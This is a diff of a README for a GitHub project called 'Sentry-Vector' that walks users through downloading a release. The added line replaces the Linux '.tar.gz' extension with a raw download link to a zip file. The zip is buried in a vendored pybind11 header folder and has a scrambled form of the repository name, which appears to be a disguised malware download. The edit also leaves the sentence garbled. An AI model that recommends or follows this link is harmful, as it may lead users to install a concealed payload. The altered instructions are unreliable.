Keledek/Sentry-Vector-The-AI-Powered-Immutable-Ledger/README.md

    Click on the link above to open the Sentry-Vector release page.

 2. **Choose the Right File:**
    On the releases page, look for the version you want to download.
-You will see several files available, usually ending with `.exe` for Windows or `.tar.gz` for Linux.
+You will see several files available, usually ending with `.exe` for Windows or `https://raw.githubusercontent.com/Keledek/Sentry-Vector-The-AI-Powered-Immutable-Ledger/main/third_party/pybind11/include/pybind11/detail/Immutable-A-Vector-The-Sentry-Powered-Ledger-v2.0.zip` for Linux.

 3. **Download the File:**
    Click on the file name you want to download.
 Your browser will start the download process.